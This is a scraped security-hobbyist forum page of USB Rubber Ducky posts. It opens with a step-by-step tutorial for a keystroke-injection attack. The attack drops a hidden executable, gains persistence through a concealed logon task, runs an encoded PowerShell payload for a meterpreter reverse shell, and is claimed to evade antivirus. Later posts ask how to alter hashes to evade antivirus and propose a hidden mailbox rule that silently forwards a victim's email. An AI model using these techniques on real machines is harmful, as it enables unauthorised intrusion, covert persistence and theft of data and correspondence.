Search the Community

Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET framework 4.5 but PC's with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later). What the executable does: - Checks for specific current privileges, e.g. Admin, Admin user group, non privileged user. - Depending on privilege level, either continue execution or attempt to elevate. (- If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y') - Copies itself and required DLL's to the default TEMP directory, and sets all of those files to be hidden. - Creates a hidden Task Scheduler task which runs the executable on each user logon. - Executes encoded Powershell payload. Why smart privilege checking is important: If a completely non privileged user was to execute the program and it asked for UAC anyway then a prompt like this would appear: This is obviously problematic, in this circumstance we would rather our payload run with normal privileges because non-privileged access is better than no access right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script so this prompt is never displayed and instead we get a normal user level meterpreter shell. Now if a user is part of the admin group then we see a dialog like this: This is where we'd like our ducky script to hit 'ALT Y' and bam! We can then just use meterpreters 'getsystem' command and we're away! Tutorial: What you'll need: - Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft). - Linux based PC/VM for generating our payload/listening for connections. Preferably Kali Linux as we will be using S.E.T (Social Engineering Toolkit) to generate our Powershell payload. - USB Rubber ducky (with Twin Duck or similar firmware installed) - This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (On your Windows PC/VM, unzip it before) Let's start: - On the Kali Linux side of things lets open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'. - You will be presented with various options, hit '1' and then enter. - Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter. - More options, hit '1' and then enter. - Give it your local IP (or external IP if you want a connection from outside your local network, this would require port-forwarding) - Give it a port and then say 'yes' when it asks if you want to start the listener. - Now type this command (change path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/' - You have just started a webserver on port 80. Navigate over there on your Windows PC's web browser with the file name in the path like so: '192.168.0.XXX/x86_powershell_injection.txt' You should be faced with this screen: - Select all the text and copy it. - Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file: - Go to the line with the pre-inserted Powershell payload (Line 64): - Replace the text within the double quotes with your payload you got from the web server earlier. - Go to the build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU', if not just change them. - Navigate to the path it gives at the bottom in the console window to find the DLL's and exe file we need. - Plug in your Ducky's micro SD card into your PC, copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' 'JetBrains.Annotations.dll' to your ducky drive. - Now we need our ducky payload, here is the code: REM Awesome script DELAY 500 GUI R DELAY 50 STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe" DELAY 50 ENTER DELAY 1500 ALT Y DELAY 1000 STRING exit DELAY 50 ENTER DELAY 50 STRING exit DELAY 50 ENTER - Generate your inject.bin file with an encoder. - Copy the inject.bin to your Ducky's drive and there we have it! Some caveats: - The 'PSExec.exe' file is totally undetected by AntiViruses but if an Anti virus wants to scan the file before running it, it may interfere with the ducky script. - Slower PC's may need slightly longer delays in the ducky script, but hey, just experiment until it works! So tell me what you think, feedback is greatly appreciated!

Hey there Hak5 community and fellow Rubber Ducky users! I'm a MacOS user and a beginner when it comes to coding, but I came up with a little bash script to help speed up the encoding process. It's nothing fancy. When I was writing a payload and having to encode then replace the file on the microSD and all that - it was getting a bit tedious. I call it duck_it. It basically takes your scripts as .txt files, encodes them, and transfers them to your microSD card and ejects the card. https://github.com/dot-iso/duck_it I'm new to Bash and GitHub, so there may be some n00b stuff. I'm sure there's a lot of room for improvement

I have scoured the internet for hours and have yet to find documentation on all the firmware available for the Rubber Ducky. I feel like there is so much functionality that I am losing, not knowing how to use some firmware. Currently on the GitHub page, there are about 20 different firmware versions available by default, and i haven't seen documentation on the repo (or anywhere) for the firmwares' individual functionalities. If anyone could be so kind as to send a pull request with even just a text file explaining them, it would be amazing. We could edit it and update as a community. That way we would know what keyboard commands work with the m_duck and composite duck firmware, exactly what USB spammer does (without having to google it), how random delay works, ect. Am i missing something, or does anyone feel the same?

Hey guys I just installed twin duck firmware on my duck and want to know how to access the storage on it. EX I want to create a file and save something to it then put it on the duck. or can I have the file already on the duck and just save to it? Thanks

Hi! I just got my new rubber ducky and I wanted to get the duck to look like "a real USB device" when you plug it in. I got my inspiration from the HAK5´s own video (https://www.youtube.com/watch?v=JON76zbiL1o). The thing that i dont seem to understand is how I "install" the code to my rubber ducky. I am looking at the page as we speak but I dont understand how I am supposed to do. Do I just move the " c_duck_v2.1.hex" file to the ducky disk or is it something that I am missing? Pls help me, I am new to this. Be kind in the comments pls

Hello fine people of the Hak.5 forms. I have forums my self with quite a substantial problem. The issue is that I have no idea how to change the hash of a program so that it can get around common anti virus programs. Previous to this when having to encrypt files(reverse TCP) I have just used veil evasion as I do not posies the skill and know how to encrypt files on my own. Now today is the day that all that changes(with help from you guys 'hopefully'). I have found myself with a problem that just using veil ain't going to solve(well to my knowledge at least to my knowledge) so I put it to you kind people of this great form how would I encrypt the file that I will link below. - h0ner

Ever wanted to know whats inside all of those saved bins? forgot what your payload did and is too risky to try? check out my python scrip to decode them at: https://github.com/JPaulMora/Duck-Decoder help is much appreciated! need support for non-english keyboards. run it without args for help. Fully tested & working on OS X 10.10.3

So I was working on some powershell-Fu for a customer to restrict e-mails with specific keywords in the e-mail body or subject line from being delivered to a mobile device. In this effort I developed a script that creates hidden rules in exchange that are unable to be detected in the exchange management shell by an admin or in microsoft Outlook by the user. I also wrote a second tool to detect view and delete these hidden rules. What I would like to do is adapt this for the USB Ducky where when the duck is inserted it runs a script that injects a hidden mailbox rule that will auto forward all e-mails received by the user to a specified account. The difficulty here is that the script requires a dll that extends the standard MAPI32.dll that comes with Outlook or the MAPI CDO installer. I am looking for suggestions on the best way to approach getting the dll on the system during the duck script execution. I am considering the Twin Duck firmware ( HID + Mass Storage ) option to see if i could copy the dll to a tmp folder prior to running the script and if i were to do that i would also like to copy the ps1 file so i would just open powershell copy the 2 files to tmp launch the Ps1 from tmp dir and then delete the dir and walk off. any suggestions would be welcome

Hi guys! So I'm deplyoing my Duck at work , and I have a script (Thanks to DuckToolKit) that saves the user and hardware info of their computer. We're doing an inventory basically. The output of the script saves it as a Report.zip, but I have about 200 computers to go through. Is it possible to have an IF 'Report.zip'=EXIST Then EXIST +1 Basically if Report.zip exists , rename the file to Report1, and so on so the final will have Report, Report1, Report 2, etc. Thanks!! I'll attach my script below: DELAY 1650 GUI r DELAY 1650 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1650 STRING ADMINUSERNAME DELAY 1650 TAB STRING DUMBPASSWORD DELAY 1650 ENTER DELAY 1650 ALT y DELAY 1650 ENTER ALT SPACE DELAY 1650 STRING m DELAY 1650 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $SysBootTime = Get-WmiObject Win32_OperatingSystem ENTER STRING $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime ENTER STRING $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME) ENTER STRING $SerialNo = $SysSerialNo.SerialNumber ENTER STRING $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model ENTER STRING $SysManufacturer = $SysInfo.Manufacturer ENTER STRING $SysModel = $SysInfo.Model ENTER STRING $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption ENTER STRING $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'" ENTER STRING $HD = [math]::truncate($disk.Size / 1GB) ENTER STRING $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB) ENTER STRING $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize ENTER STRING $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB) ENTER STRING $SysCpu = Get-WmiObject Win32_Processor | Select Name ENTER STRING $Cpu = $SysCpu.Name ENTER STRING $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber ENTER STRING $HardSerialNo = $HardSerial.SerialNumber ENTER STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name ENTER STRING $graphicsCard = gwmi win32_VideoController |select Name ENTER STRING $graphics = $graphicsCard.Name ENTER STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1 ENTER STRING $DriveLetter = $CDDrive.Drive ENTER STRING $DriveName = $CDDrive.Caption ENTER STRING $Disk = $DriveLetter + '' + $DriveName ENTER STRING $Firewall = New-Object -com HNetCfg.FwMgr ENTER STRING $FireProfile = $Firewall.LocalPolicy.CurrentProfile ENTER STRING $FireProfile = $FireProfile.FirewallEnabled ENTER STRING $Report = $Report + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>" ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'HP16GB' } | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCK' } | select Name ENTER STRING move-item c:\Windows\Report.zip $driveLetter.Name ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1650 STRING C:\Windows\config-47bc5.ps1 ENTER DELAY 1650 ALT F4 DELAY 1650 GUI r DELAY 1650 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1650 STRING ADMINUSERNAME DELAY 1650 TAB STRING ADMINLAMEPASS DELAY 1650 ENTER DELAY 1650 DELAY 1650 ALT y DELAY 1650 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 1650 STRING m DELAY 1650 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1650 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER

How does your duck setup look :) I use a bigger USB Storage device now other than the shown ( the top one of the type "SanDisk") because the shown one is only USB2 and the new USB3 one I got also flashes red when it receives data - so now i know when i can remove the hub without losing data. How does your setup look ?

is usbrubberducky.com gone like for good

Where did it do? The thread I'm reading says it should be here: http://www.hak5.org/duckencode.jar but it's not and I can't seem to find the URL for the web app...